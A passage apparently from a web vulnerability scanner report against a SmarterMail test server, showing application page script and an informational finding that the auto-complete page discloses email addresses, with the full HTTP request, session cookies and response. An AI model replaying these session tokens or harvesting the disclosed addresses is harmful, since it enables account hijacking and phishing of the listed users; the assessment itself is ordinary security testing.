           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('main/calendar/frmevent', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

   <script type="text/javascript">
       function OpenMasterCategoriesPopup() { SpawnHyperWindow("/Main/frmPopupContactCategories.aspx", 450, 270, RefreshWindow); }
       function RefreshWindow() { __doPostBack("ctl00$MPH$lnkRefresh", ""); }
       function openpopupto() { SpawnHyperWindowWithData("/Main/frmPopupContactsList.aspx", 450, 338, UpdateComboBox, UpdateText); }
       function DoNothing() { }
       function UpdateText(data) {
           var input = $get('ctl00_MPH_InviteBox_Input');
           input.value = data + " " + input.value;
       }
       function UpdateComboBox() {
           $find('ctl00_MPH_InviteBox').set_text($get('ctl00_MPH_InviteBox_Input').value);
       }
       function KeyPressing(sender, eventArgs) {
           if (eventArgs.get_domEvent().keyCode == 188) {
               sender.set_text(sender.get_text() + ";");
               eventArgs.get_domEvent().preventDefault();
               return false;
           }
       }
       function DoAvailability(cname) {
           var sDate = $find('ctl00_MPH_StartDatePicker_SettingText').get_selectedDate();
           var edp = $find('ctl00_MPH_EndDatePicker_SettingText');
           var eDate = sDate;
           if (edp != null) eDate = edp.get_selectedDate();

           var popurl = "/UserControls/Popups/frmPopupAvailability.aspx?date=" + sDate.format("yyyy-MM-dd") + "&eDate=" + eDate.format("yyyy-MM-dd") + "&users=" + $get('ctl00_MPH_InviteBox_Input').value.replace(/\n/g, ";").replace(/\r/g, ";");
           GenericPopup(popurl, "availabilitywindow", "width=600,height=250,scrollbars,resizable=yes");
       }
   </script>


   

<script type="text/javascript">
//<![CDATA[
UpdateSidebarCounts('UserSync', 0);
WebForm_AutoFocus('ctl00_MPH_SubjectBox_SettingText');Sys.Application.initialize();
$(function() { $('#ctl00_TPH_TabStrip').hyperTabStrip({"MultiPageClientID":"ctl00_MPH_MP1","FunctionMap":{},"PageViewMap":{"ctl00_TPH_TabStrip_Tab1":"ctl00_MPH_OptionsTab","ctl00_TPH_TabStrip_Tab2":"ctl00_MPH_RecurTab","ctl00_TPH_TabStrip_Tab4":"ctl00_MPH_DescriptionTab","ctl00_TPH_TabStrip_Tab3":"ctl00_MPH_pvCategories"},"ClientCallbacks":{}}); });
modules['vmNotBlank_txt']='Must have a value';
$(function() {$vc({"lt":"Subject","vcID":"ctl00_MPH_SubjectBox_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},true);});

WebForm_InitCallback();Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadComboBox, {"_dropDownWidth":0,"_height":0,"_isAspNet35":true,"_showDropDownOnTextboxClick":false,"_skin":"SmarterTools","_uniqueId":"ctl00$MPH$InviteBox","allowCustomText":true,"autoCompleteSeparator":";","clientStateFieldID":"ctl00_MPH_InviteBox_ClientState","collapseAnimation":"{\"type\":0,\"duration\":450}","enableLoadOnDemand":true,"enableTextSelection":false,"expandAnimation":"{\"type\":0,\"duration\":450}","itemData":[],"itemRequestTimeout":333}, {"keyPressing":KeyPressing}, null, $get("ctl00_MPH_InviteBox"));
});
modules['vmOptional_txt']='Value is optional';
$(function() {$vc({"lt":"Location","vcID":"ctl00_MPH_LocationBox_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"10/3/2010 9:15:00 AM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$StartDatePicker_SettingText\u0027,\u0027\u0027)","_skin":"SmarterTools","autoPostBack":true,"clientStateFieldID":"ctl00_MPH_StartDatePicker_SettingText_dateInput_ClientState","dateFormat":"M/d/yyyy h:mm tt","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Year":2,"Month":0,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":false},"displayDateFormat":"M/d/yyyy h:mm tt","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2100-01-01-00-00-00","minDate":"1900-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_StartDatePicker_SettingText_dateInput"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadCalendar, {"_DayRenderChangedDays":{},"_FormatInfoArray":[["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],["January","February","March","April","May","June","July","August","September","October","November","December",""],["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"dddd, MMMM dd, yyyy h:mm:ss tt","dddd, MMMM dd, yyyy","h:mm:ss tt","MMMM dd","ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","M/d/yyyy","h:mm tt","yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","MMMM, yyyy","AM","PM","/",":",0],"_ViewRepeatableDays":{},"_ViewsHash":{"ctl00_MPH_StartDatePicker_SettingText_calendar_Top" : [[2010,10,1], 1]},"_calendarWeekRule":0,"_culture":"en-US","_enableKeyboardNavigation":false,"_enableViewSelector":false,"_firstDayOfWeek":7,"_postBackCall":"__doPostBack(\u0027ctl00$MPH$StartDatePicker_SettingText$calendar\u0027,\u0027@@\u0027)","clientStateFieldID":"ctl00_MPH_StartDatePicker_SettingText_calendar_ClientState","enableMultiSelect":false,"enabled":true,"monthYearNavigationSettings":["Today","OK","Cancel","Date is out of range.","False","True","300","1","300","1"],"skin":"SmarterTools","specialDaysArray":[],"stylesHash":{"DayStyle": ["", ""],"CalendarTableStyle": ["", "rcMainTable"],"OtherMonthDayStyle": ["", "rcOtherMonth"],"TitleStyle": ["", ""],"SelectedDayStyle": ["", "rcSelected"],"SelectorStyle": ["", ""],"DisabledDayStyle": ["", "rcDisabled"],"OutOfRangeDayStyle": ["", "rcOutOfRange"],"WeekendDayStyle": ["", "rcWeekend"],"DayOverStyle": ["", "rcHover"],"FastNavigationStyle": ["", "RadCalendarMonthView RadCalendarMonthView_SmarterTools"],"ViewSelectorStyle": ["", "rcViewSel"]},"useColumnHeadersAsSelectors":false,"useRowHeadersAsSelectors":false}, null, null, $get("ctl00_MPH_StartDatePicker_SettingText_calendar"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadTimeView, {"_ItemsCount":48,"_OwnerDatePickerID":"ctl00_MPH_StartDatePicker_SettingText","_TimeOverStyleCss":"rcHover","_culture":"en-US","_renderDirection":"Horizontal","_timeFormat":"t","clientStateFieldID":"ctl00_MPH_StartDatePicker_SettingText_timeView_ClientState","columns":4,"endTime":"0-19-0-0-0","interval":"0-0-15-0-0","itemStyles":{"TimeStyle": ["", ""],"AlternatingTimeStyle": ["", ""],"HeaderStyle": ["", "rcHeader"],"FooterStyle": ["", "rcFooter"],"TimeOverStyle": ["", "rcHover"]},"startTime":"0-7-0-0-0"}, null, null, $get("ctl00_MPH_StartDatePicker_SettingText_timeView"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateTimePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif"},"_TimePopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/Upcoming.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/Upcoming.gif"},"_animationSettings":{ ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:0,HideAnimationType:1},"_popupControlID":"ctl00_MPH_StartDatePicker_SettingText_popupButton","_timePopupControlID":"ctl00_MPH_StartDatePicker_SettingText_timePopupLink","autoPostBackControl":1,"clientStateFieldID":"ctl00_MPH_StartDatePicker_SettingText_ClientState","focusedDate":"2010-10-02-00-00-00","maxDate":"2100-01-01-00-00-00","minDate":"1900-01-01-00-00-00"}, null, {"calendar":"ctl00_MPH_StartDatePicker_SettingText_calendar","dateInput":"ctl00_MPH_StartDatePicker_SettingText_dateInput","timeView":"ctl00_MPH_StartDatePicker_SettingText_timeView"}, $get("ctl00_MPH_StartDatePicker_SettingText"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"10/3/2010 10:15:00 AM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$EndDatePicker_SettingText\u0027,\u0027\u0027)","_skin":"SmarterTools","autoPostBack":true,"clientStateFieldID":"ctl00_MPH_EndDatePicker_SettingText_dateInput_ClientState","dateFormat":"M/d/yyyy h:mm tt","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Year":2,"Month":0,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":false},"displayDateFormat":"M/d/yyyy h:mm tt","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2100-01-01-00-00-00","minDate":"1900-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_EndDatePicker_SettingText_dateInput"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadCalendar, {"_DayRenderChangedDays":{},"_FormatInfoArray":[["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],["January","February","March","April","May","June","July","August","September","October","November","December",""],["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"dddd, MMMM dd, yyyy h:mm:ss tt","dddd, MMMM dd, yyyy","h:mm:ss tt","MMMM dd","ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","M/d/yyyy","h:mm tt","yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","MMMM, yyyy","AM","PM","/",":",0],"_ViewRepeatableDays":{},"_ViewsHash":{"ctl00_MPH_EndDatePicker_SettingText_calendar_Top" : [[2010,10,1], 1]},"_calendarWeekRule":0,"_culture":"en-US","_enableKeyboardNavigation":false,"_enableViewSelector":false,"_firstDayOfWeek":7,"_postBackCall":"__doPostBack(\u0027ctl00$MPH$EndDatePicker_SettingText$calendar\u0027,\u0027@@\u0027)","clientStateFieldID":"ctl00_MPH_EndDatePicker_SettingText_calendar_ClientState","enableMultiSelect":false,"enabled":true,"monthYearNavigationSettings":["Today","OK","Cancel","Date is out of range.","False","True","300","1","300","1"],"skin":"SmarterTools","specialDaysArray":[],"stylesHash":{"DayStyle": ["", ""],"CalendarTableStyle": ["", "rcMainTable"],"OtherMonthDayStyle": ["", "rcOtherMonth"],"TitleStyle": ["", ""],"SelectedDayStyle": ["", "rcSelected"],"SelectorStyle": ["", ""],"DisabledDayStyle": ["", "rcDisabled"],"OutOfRangeDayStyle": ["", "rcOutOfRange"],"WeekendDayStyle": ["", "rcWeekend"],"DayOverStyle": ["", "rcHover"],"FastNavigationStyle": ["", "RadCalendarMonthView RadCalendarMonthView_SmarterTools"],"ViewSelectorStyle": ["", "rcViewSel"]},"useColumnHeadersAsSelectors":false,"useRowHeadersAsSelectors":false}, null, null, $get("ctl00_MPH_EndDatePicker_SettingText_calendar"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadTimeView, {"_ItemsCount":48,"_OwnerDatePickerID":"ctl00_MPH_EndDatePicker_SettingText","_TimeOverStyleCss":"rcHover","_culture":"en-US","_renderDirection":"Horizontal","_timeFormat":"t","clientStateFieldID":"ctl00_MPH_EndDatePicker_SettingText_timeView_ClientState","columns":4,"endTime":"0-19-0-0-0","interval":"0-0-15-0-0","itemStyles":{"TimeStyle": ["", ""],"AlternatingTimeStyle": ["", ""],"HeaderStyle": ["", "rcHeader"],"FooterStyle": ["", "rcFooter"],"TimeOverStyle": ["", "rcHover"]},"startTime":"0-7-0-0-0"}, null, null, $get("ctl00_MPH_EndDatePicker_SettingText_timeView"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateTimePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif"},"_TimePopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/Upcoming.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/Upcoming.gif"},"_animationSettings":{ ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:0,HideAnimationType:1},"_popupControlID":"ctl00_MPH_EndDatePicker_SettingText_popupButton","_timePopupControlID":"ctl00_MPH_EndDatePicker_SettingText_timePopupLink","autoPostBackControl":1,"clientStateFieldID":"ctl00_MPH_EndDatePicker_SettingText_ClientState","focusedDate":"2010-10-02-00-00-00","maxDate":"2100-01-01-00-00-00","minDate":"1900-01-01-00-00-00"}, null, {"calendar":"ctl00_MPH_EndDatePicker_SettingText_calendar","dateInput":"ctl00_MPH_EndDatePicker_SettingText_dateInput","timeView":"ctl00_MPH_EndDatePicker_SettingText_timeView"}, $get("ctl00_MPH_EndDatePicker_SettingText"));
});
$(function() {$vc({"lt":"Email Notification","vcID":"ctl00_MPH_txtEmailMe_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false,"vmRequiredCheckbox":"ctl00_MPH_ctl07"}},false);});
$(function() {$vc({"lt":"Description","vcID":"ctl00_MPH_DescriptionBox_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
//]]>
</script>
</form>
</body>
</html>


7.4. http://vulnerable.smartermail.site:9998/Main/frmAutocomplete.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smartermail.site:9998
Path:   /Main/frmAutocomplete.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /Main/frmAutocomplete.aspx HTTP/1.1
Host: vulnerable.smartermail.site:9998
Proxy-Connection: keep-alive
Referer: http://vulnerable.smartermail.site:9998/Default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dbg5avn0mzbrp22rculzvx55; SelectedLanguage=; settings=NqrSEiEtkzXQzORdp%2bg33xCkJy7Yi2at5xmX%2be4AJ2U%3d; SM5Skin=Default; STTTState={"NAVMySettingsFiltering":"true","NAVMySettingsSharing":"true","NAVMySettingsAdvancedSettings":"true"}; STHashCookie={"CountsGuid":"878548840","TopBarSection":"UserSettings"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 16:03:40 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 12840



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Auto-complete - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
   <form method="post" action="frmAutocomplete.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzAxMzExOTYyDxYGHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UeCnNlc3Npb25LZXkFIDZlZjJmMmY4ODUyMjRhZTlhMDg4NTYyZTIzNTQxZmIzFgJmD2QWAgIBD2QWCgIDD2QWAgIDD2QWAgIBD2QWAgIBDw8WAh4EVGV4dAUJU2VhcmNoLi4uZGQCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTseB1Zpc2libGVoZAIGDxYCHwVoZAIHD2QWAmYPZBYCAgEPFgIfBWgWAgIBDxYCHwNlZAIIDxYCHwVoZBgBBRRjdGwwMCRNUEgkSHlwZXJHcmlkMQ8FNFRydWV8VHJ1ZXx8RmFsc2V8VHJ1ZXxlbWFpbGFkZHJlc3MgYXNjfEZhbHNlfEZhbHNlfDBkfsdaYms0jC0poHeXJ75WOHFlsy8=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstCjdZSr2uDpU6O2NTF1ISnP_zYh5FLRQP7rbZ36OXJ90&amp;t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="../Services/svcSuperHyperGrid.asmx/js" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = false;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UP1'], ['ctl00$BrPH$SearchBar$btnGo','ctl00$BrPH$SearchBar$btnClear','ctl00$BPH$DeleteButton'], [], 90);
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       Auto-complete
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_DeleteButton" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteButton(); return false;"><span class="BBInner">Delete</span></a></div>

           </div>
           <div class="ButtonBarRight">
               
   
<div id="FilterBarContents" class="RoundedSearchBox">
   <div class="RoundedSearchBoxLeft">
       <div class="RoundedSearchBoxRight">
           <label for="ctl00_BrPH_SearchBar_FilterBox" id="ctl00_BrPH_SearchBar_FilterBoxLabel" style="display: none">Search...</label>
           <div id="ctl00_BrPH_SearchBar_btnGo" class="BBButton GoButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BrPH$SearchBar$btnGo',''); return false;"><span class="BBInner"></span></a></div>
           <input name="ctl00$BrPH$SearchBar$FilterBox" type="text" id="ctl00_BrPH_SearchBar_FilterBox" autocomplete="off" />
           <div id="ctl00_BrPH_SearchBar_btnClear" class="BBButton ClearButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BrPH$SearchBar$btnClear',''); return false;"><span class="BBInner"></span></a></div>
       </div>
   </div>
</div>


   <script type="text/javascript">
var startup = function() {
$("#FilterBarContents").magicLabels();

$("#ctl00_BrPH_SearchBar_FilterBox").keypress(function(event) {
if (event.keyCode == 13) {
__doPostBack('ctl00$BrPH$SearchBar$btnGo','');
event.preventDefault();
}
});

$("#ctl00_BrPH_SearchBar_btnClear").click(function() {
$("#ctl00_BrPH_SearchBar_FilterBox").val('');
$("#FilterBarContents").magicLabels();
});
}
setTimeout(startup, 1);
   </script>




           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <div id="ctl00_MPH_UP1">
   
           
<table id="ctl00_MPH_HyperGrid1OuterTable" class="HyperGridOuter" style="border-collapse:collapse;border-spacing:0px;width:100%;">
   <tr>
       <td class="HyperGridContentCell" id="ctl00_MPH_HyperGrid1ContentCell" style="padding:0;vertical-align:top;" >
           <div class="HyperGridWrapper" id="ctl00_MPH_HyperGrid1" style="padding-right:0;">
               <div id="ctl00_MPH_HyperGrid1HeaderWrapper" style="">
                   <table id="ctl00_MPH_HyperGrid1HeaderTable" class="HyperGrid" style="table-layout: fixed">
<colgroup><col /><col /><col /><col /></colgroup>
<thead>
<tr><th scope="col" class="showsel lc nw CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_HyperGrid1CheckAll" name="ctl00$MPH$HyperGrid1CheckAll" /></th><th scope="col" class="nw" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=emailaddress desc')">Email Address<img src='/App_Themes/Default/Images/Misc/up.gif' /></a></th><th scope="col" class="nw leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=displayas asc')">Display Name</a></th><th scope="col" class="rc nw leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=source asc')">Source</a></th></tr>
</thead>
                   </table>
               </div>
               <div id="ctl00_MPH_HyperGrid1ContentWrapper" class="HyperGridContentWrapper" style="overflow-y:hidden;overflow-x:visible;">
                   <table id="ctl00_MPH_HyperGrid1ContentTable" class="HyperGrid">
<colgroup><col /><col /><col /><col /></colgroup>
                   </table>
               </div>
           </div>
       </td>
   </tr>
</table>
<div id="ctl00_MPH_HyperGrid1Scroller" class="HyperGridScroller" style="visibility:hidden;position:relative;width:22px;overflow-y:scroll;" ><div id="ctl00_MPH_HyperGrid1InnerScroller" style="height: 10px"></div></div>
<div style="position:absolute;top:-100px;width:0;height:0;">
<input id="ctl00_MPH_HyperGrid1Focuser" type="text" style="width:1px;height:1px;margin:0;padding:0;outline:none;border:none" />
<input id="ctl00_MPH_HyperGrid1SelectedIDs" name="ctl00$MPH$HyperGrid1SelectedIDs" type="text" style="width:1px;height:1px;margin:0;padding:0;outline:none;border:none" />
<input id="ctl00_MPH_HyperGrid1ScrollPos" name="ctl00$MPH$HyperGrid1ScrollPos" type="text" style="width:1px;height:1px;margin:0;padding:0;outline:none;border:none" />
</div>
       
</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('main/frmautocomplete', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

   <script type="text/javascript">
document.AdditionalResizeEvent = function() {
if (self["ctl00_MPH_HyperGrid1"]) self["ctl00_MPH_HyperGrid1"].Resize();
};
   </script>


   

<script type="text/javascript">
//<![CDATA[
UpdateSidebarCounts('UserSync', 0);
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fMain\x2ffrmAutocomplete\x2easpx?'); });

           var ctl00_MPH_HyperGrid1 = null;
           function LoadFuncctl00_MPH_HyperGrid1() {
               var dataSource = {"rows":[{"uid":"global address list|7626f67442fc453e9bb828c65fa7edd0","rowNumber":0,"d":false,"n":false,"columns":[{"v":"\u003cinput type=checkbox /\u003e","c":"showsel lc nw CheckBoxColumn"},{"v":"enduser@hoytllc.com","c":"nw"},{"v":"","c":"nw leftpad"},{"v":"Global Address List","c":"rc nw leftpad"}],"urls":[]},{"uid":"global address list|dc72486547f84bf4b1fb2a39747d2d47","rowNumber":1,"d":false,"n":false,"columns":[{"v":"\u003cinput type=checkbox /\u003e","c":"showsel lc nw CheckBoxColumn"},{"v":"euser@hoytllc.com","c":"nw"},{"v":"","c":"nw leftpad"},{"v":"Global Address List","c":"rc nw leftpad"}],"urls":[]},{"uid":"global address list|C1E7F96C-4DD7-43F9-8041-4B9EC3196BFB","rowNumber":2,"d":false,"n":false,"columns":[{"v":"\u003cinput type=checkbox /\u003e","c":"showsel lc nw CheckBoxColumn"},{"v":"testit@hoytllc.com","c":"nw"},{"v":"testit@hoytllc.com","c":"nw leftpad"},{"v":"Global Address List","c":"rc nw leftpad"}],"urls":[]},{"uid":"global address list|101984A8-5148-479C-8D15-8DFE9347195C","rowNumber":3,"d":false,"n":false,"columns":[{"v":"\u003cinput type=checkbox /\u003e","c":"showsel lc nw CheckBoxColumn"},{"v":"testme@hoytllc.com","c":"nw"},{"v":"testme@hoytllc.com","c":"nw leftpad"},{"v":"Global Address List","c":"rc nw leftpad"}],"urls":[]}],"checkedRows":[],"totalRows":4,"dirtyKey":"634216206445584000","labelText":null,"additionalJavascript":null};
